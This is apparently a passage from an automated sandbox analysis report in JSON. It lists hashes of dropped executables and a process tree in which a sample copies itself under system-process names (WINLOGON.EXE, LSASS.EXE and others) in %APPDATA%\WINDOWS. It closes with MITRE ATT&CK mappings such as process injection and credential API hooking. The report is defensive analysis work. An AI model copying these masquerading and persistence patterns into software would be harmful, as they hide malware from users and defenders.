true}, {"name": "D3_08.EXE.67E3CC1F.bin", "file_size": 163903, "sha256": "cd588b9982f9591730d55a4e9975ffa543674e578ad16c7e9f92e0c03d6c77c5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67E3CD97.bin", "file_size": 163903, "sha256": "90b09b267ded32cd0239e44da0ec84d934a99e6c6489a1b35c8ee8ade991edf7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67E3CBAD.bin", "file_size": 163903, "sha256": "9638ace17af557b99a72fcbc68fee5d6df4a30c4f3da64d02163d1d706403cb1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "D3_08.EXE.67E3D312.bin", "file_size": 163903, "sha256": "30f3e31be2ed8d6f190663514b6aab6a2f6705ce8bbe05701fbc6a7884803a92", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67E3CBB0.bin", "file_size": 163903, "sha256": "90b09b267ded32cd0239e44da0ec84d934a99e6c6489a1b35c8ee8ade991edf7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IEXPLORER.EXE.67E3D31A.bin", "file_size": 163903, "sha256": "9a8795edba2015e33f33d933bdfc43890afb8dbb881aac7b36a3cd30e45344f0", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .BAS (Pseudo-Code) Files compiled with C2.EXE 6.0 (Visual Basic 6) (build: 8169)", "7 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 8041)", "1 .ASM Files assembled with MASM 6.13 (Visual Studio 6 SP1) (build: 7299)"], "imported_objects": [], "file_analysis": ["File contains Visual Basic code", "File contains assembly code", "File is the product of a small codebase (9 files)"], "total_file_compositions_imports": 0}, "processes": [{"uid": "00000000-00000940", "name": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe", "normalized_path": "C:\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe", "sha256": "04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526"}, {"uid": "00000000-00004664", "parentuid": "00000000-00000940", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "9638ace17af557b99a72fcbc68fee5d6df4a30c4f3da64d02163d1d706403cb1"}, {"uid": "00000000-00005612", "parentuid": "00000000-00004664", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "9638ace17af557b99a72fcbc68fee5d6df4a30c4f3da64d02163d1d706403cb1"}, {"uid": "00000000-00005784", "parentuid": "00000000-00004664", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "90b09b267ded32cd0239e44da0ec84d934a99e6c6489a1b35c8ee8ade991edf7"}, {"uid": "00000000-00001308", "parentuid": "00000000-00004664", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "2d130b940f2eb64a732bb081194491bd517e7d6bf02eeea87fa2d1c038335cc9"}, {"uid": "00000000-00006032", "parentuid": "00000000-00001308", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "9638ace17af557b99a72fcbc68fee5d6df4a30c4f3da64d02163d1d706403cb1"}, {"uid": "00000000-00004112", "parentuid": "00000000-00001308", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "90b09b267ded32cd0239e44da0ec84d934a99e6c6489a1b35c8ee8ade991edf7"}, {"uid": "00000000-00004168", "parentuid": "00000000-00001308", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "2d130b940f2eb64a732bb081194491bd517e7d6bf02eeea87fa2d1c038335cc9"}, {"uid": "00000000-00001916", "parentuid": "00000000-00001308", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "f32ef5543d36573ac60df400d19c805ac18808320a71fe65072d4ad66e652869"}, {"uid": "00000000-00005868", "parentuid": "00000000-00001308", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "19981ff11a5e0d2cd5e0ba07af3c67f9e2a71db415120f4362ba067448e1ad2d"}, {"uid": "00000000-00003048", "parentuid": "00000000-00001308", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "185391e7160b5d818b8b60e0e2373269a5fc03c93dc426997454bb8d3cff497b"}, {"uid": "00000000-00004280", "parentuid": "00000000-00001308", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "08baa9cfce73132356fa68cdba2f85463f82c4485c09c5100d16501106f63076"}, {"uid": "00000000-00005824", "parentuid": "00000000-00004664", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "f32ef5543d36573ac60df400d19c805ac18808320a71fe65072d4ad66e652869"}, {"uid": "00000000-00003164", "parentuid": "00000000-00004664", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "19981ff11a5e0d2cd5e0ba07af3c67f9e2a71db415120f4362ba067448e1ad2d"}, {"uid": "00000000-00005636", "parentuid": "00000000-00003164", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "9638ace17af557b99a72fcbc68fee5d6df4a30c4f3da64d02163d1d706403cb1"}, {"uid": "00000000-00004172", "parentuid": "00000000-00003164", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "90b09b267ded32cd0239e44da0ec84d934a99e6c6489a1b35c8ee8ade991edf7"}, {"uid": "00000000-00003856", "parentuid": "00000000-00003164", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "2d130b940f2eb64a732bb081194491bd517e7d6bf02eeea87fa2d1c038335cc9"}, {"uid": "00000000-00001132", "parentuid": "00000000-00003164", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "f32ef5543d36573ac60df400d19c805ac18808320a71fe65072d4ad66e652869"}, {"uid": "00000000-00004272", "parentuid": "00000000-00003164", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "19981ff11a5e0d2cd5e0ba07af3c67f9e2a71db415120f4362ba067448e1ad2d"}, {"uid": "00000000-00004224", "parentuid": "00000000-00003164", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "185391e7160b5d818b8b60e0e2373269a5fc03c93dc426997454bb8d3cff497b"}, {"uid": "00000000-00002792", "parentuid": "00000000-00003164", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "08baa9cfce73132356fa68cdba2f85463f82c4485c09c5100d16501106f63076"}, {"uid": "00000000-00003120", "parentuid": "00000000-00004664", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "185391e7160b5d818b8b60e0e2373269a5fc03c93dc426997454bb8d3cff497b"}, {"uid": "00000000-00003928", "parentuid": "00000000-00003120", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "9638ace17af557b99a72fcbc68fee5d6df4a30c4f3da64d02163d1d706403cb1"}, {"uid": "00000000-00002608", "parentuid": "00000000-00003120", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "90b09b267ded32cd0239e44da0ec84d934a99e6c6489a1b35c8ee8ade991edf7"}, {"uid": "00000000-00003488", "parentuid": "00000000-00003120", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "2d130b940f2eb64a732bb081194491bd517e7d6bf02eeea87fa2d1c038335cc9"}, {"uid": "00000000-00003024", "parentuid": "00000000-00003120", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "f32ef5543d36573ac60df400d19c805ac18808320a71fe65072d4ad66e652869"}, {"uid": "00000000-00002788", "parentuid": "00000000-00003120", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "19981ff11a5e0d2cd5e0ba07af3c67f9e2a71db415120f4362ba067448e1ad2d"}, {"uid": "00000000-00000708", "parentuid": "00000000-00003120", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "185391e7160b5d818b8b60e0e2373269a5fc03c93dc426997454bb8d3cff497b"}, {"uid": "00000000-00000468", "parentuid": "00000000-00003120", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "08baa9cfce73132356fa68cdba2f85463f82c4485c09c5100d16501106f63076"}, {"uid": "00000000-00004116", "parentuid": "00000000-00004664", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "08baa9cfce73132356fa68cdba2f85463f82c4485c09c5100d16501106f63076"}, {"uid": "00000000-00001720", "parentuid": "00000000-00004116", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "cd588b9982f9591730d55a4e9975ffa543674e578ad16c7e9f92e0c03d6c77c5"}, {"uid": "00000000-00002824", "parentuid": "00000000-00001720", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "cd588b9982f9591730d55a4e9975ffa543674e578ad16c7e9f92e0c03d6c77c5"}, {"uid": "00000000-00003904", "parentuid": "00000000-00001720", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "90b09b267ded32cd0239e44da0ec84d934a99e6c6489a1b35c8ee8ade991edf7"}, {"uid": "00000000-00003920", "parentuid": "00000000-00003904", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "cd588b9982f9591730d55a4e9975ffa543674e578ad16c7e9f92e0c03d6c77c5"}, {"uid": "00000000-00000568", "parentuid": "00000000-00003904", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "90b09b267ded32cd0239e44da0ec84d934a99e6c6489a1b35c8ee8ade991edf7"}, {"uid": "00000000-00002084", "parentuid": "00000000-00003904", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "e00c1dbd3c36c872f7113de16cbc4d8afddb929642265625c37c960e28fef013"}, {"uid": "00000000-00003068", "parentuid": "00000000-00001720", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "2d130b940f2eb64a732bb081194491bd517e7d6bf02eeea87fa2d1c038335cc9"}, {"uid": "00000000-00002300", "parentuid": "00000000-00001720", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "f32ef5543d36573ac60df400d19c805ac18808320a71fe65072d4ad66e652869"}, {"uid": "00000000-00004252", "parentuid": "00000000-00001720", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "19981ff11a5e0d2cd5e0ba07af3c67f9e2a71db415120f4362ba067448e1ad2d"}, {"uid": "00000000-00002880", "parentuid": "00000000-00001720", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "185391e7160b5d818b8b60e0e2373269a5fc03c93dc426997454bb8d3cff497b"}, {"uid": "00000000-00000620", "parentuid": "00000000-00001720", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "08baa9cfce73132356fa68cdba2f85463f82c4485c09c5100d16501106f63076"}, {"uid": "00000000-00000600", "parentuid": "00000000-00004116", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "90b09b267ded32cd0239e44da0ec84d934a99e6c6489a1b35c8ee8ade991edf7"}, {"uid": "00000000-00001084", "parentuid": "00000000-00004116", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "2d130b940f2eb64a732bb081194491bd517e7d6bf02eeea87fa2d1c038335cc9"}, {"uid": "00000000-00002820", "parentuid": "00000000-00004116", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "f32ef5543d36573ac60df400d19c805ac18808320a71fe65072d4ad66e652869"}, {"uid": "00000000-00003044", "parentuid": "00000000-00004116", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "19981ff11a5e0d2cd5e0ba07af3c67f9e2a71db415120f4362ba067448e1ad2d"}, {"uid": "00000000-00000176", "parentuid": "00000000-00004116", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "185391e7160b5d818b8b60e0e2373269a5fc03c93dc426997454bb8d3cff497b"}, {"uid": "00000000-00002168", "parentuid": "00000000-00004116", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "08baa9cfce73132356fa68cdba2f85463f82c4485c09c5100d16501106f63076"}, {"uid": "00000000-00005576", "parentuid": "00000000-00000940", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "90b09b267ded32cd0239e44da0ec84d934a99e6c6489a1b35c8ee8ade991edf7"}, {"uid": "00000000-00004928", "parentuid": "00000000-00005576", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "9638ace17af557b99a72fcbc68fee5d6df4a30c4f3da64d02163d1d706403cb1"}, {"uid": "00000000-00005972", "parentuid": "00000000-00005576", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "90b09b267ded32cd0239e44da0ec84d934a99e6c6489a1b35c8ee8ade991edf7"}, {"uid": "00000000-00005260", "parentuid": "00000000-00005576", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "2d130b940f2eb64a732bb081194491bd517e7d6bf02eeea87fa2d1c038335cc9"}, {"uid": "00000000-00005588", "parentuid": "00000000-00005576", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "f32ef5543d36573ac60df400d19c805ac18808320a71fe65072d4ad66e652869"}, {"uid": "00000000-00003988", "parentuid": "00000000-00005576", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "19981ff11a5e0d2cd5e0ba07af3c67f9e2a71db415120f4362ba067448e1ad2d"}, {"uid": "00000000-00002068", "parentuid": "00000000-00005576", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "185391e7160b5d818b8b60e0e2373269a5fc03c93dc426997454bb8d3cff497b"}, {"uid": "00000000-00005980", "parentuid": "00000000-00005576", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "08baa9cfce73132356fa68cdba2f85463f82c4485c09c5100d16501106f63076"}, {"uid": "00000000-00004040", "parentuid": "00000000-00000940", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "2d130b940f2eb64a732bb081194491bd517e7d6bf02eeea87fa2d1c038335cc9"}, {"uid": "00000000-00005884", "parentuid": "00000000-00000940", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "f32ef5543d36573ac60df400d19c805ac18808320a71fe65072d4ad66e652869"}, {"uid": "00000000-00005792", "parentuid": "00000000-00005884", "name": "D3_08.exe", "normalized_path": "%WINDIR%\\D3_08.exe", "sha256": "9638ace17af557b99a72fcbc68fee5d6df4a30c4f3da64d02163d1d706403cb1"}, {"uid": "00000000-00006044", "parentuid": "00000000-00005884", "name": "IExplorer.exe", "normalized_path": "%WINDIR%\\system32\\IExplorer.exe", "sha256": "90b09b267ded32cd0239e44da0ec84d934a99e6c6489a1b35c8ee8ade991edf7"}, {"uid": "00000000-00003100", "parentuid": "00000000-00005884", "name": "WINLOGON.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\WINLOGON.EXE", "sha256": "2d130b940f2eb64a732bb081194491bd517e7d6bf02eeea87fa2d1c038335cc9"}, {"uid": "00000000-00003168", "parentuid": "00000000-00005884", "name": "CSRSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\CSRSS.EXE", "sha256": "f32ef5543d36573ac60df400d19c805ac18808320a71fe65072d4ad66e652869"}, {"uid": "00000000-00005428", "parentuid": "00000000-00005884", "name": "SERVICES.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SERVICES.EXE", "sha256": "19981ff11a5e0d2cd5e0ba07af3c67f9e2a71db415120f4362ba067448e1ad2d"}, {"uid": "00000000-00006056", "parentuid": "00000000-00005884", "name": "LSASS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\LSASS.EXE", "sha256": "185391e7160b5d818b8b60e0e2373269a5fc03c93dc426997454bb8d3cff497b"}, {"uid": "00000000-00002060", "parentuid": "00000000-00005884", "name": "SMSS.EXE", "normalized_path": "%APPDATA%\\WINDOWS\\SMSS.EXE", "sha256": "08baa9cfce73132356fa68cdba2f85463f82c4485c09c5100d16501106f63076"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Drive-by Compromise", "attck_id": "T1189", "attck_id_wiki": "https://attack.mitre.org/techniques/T1189", "suspicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 2, "informative_identifiers_count": 9}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 1}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 5}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Code Signing Policy Modification", "attck_id": "T1553.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Match Legitimate Name or Location", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005", "malicious_identifiers_count": 2, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 3, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": 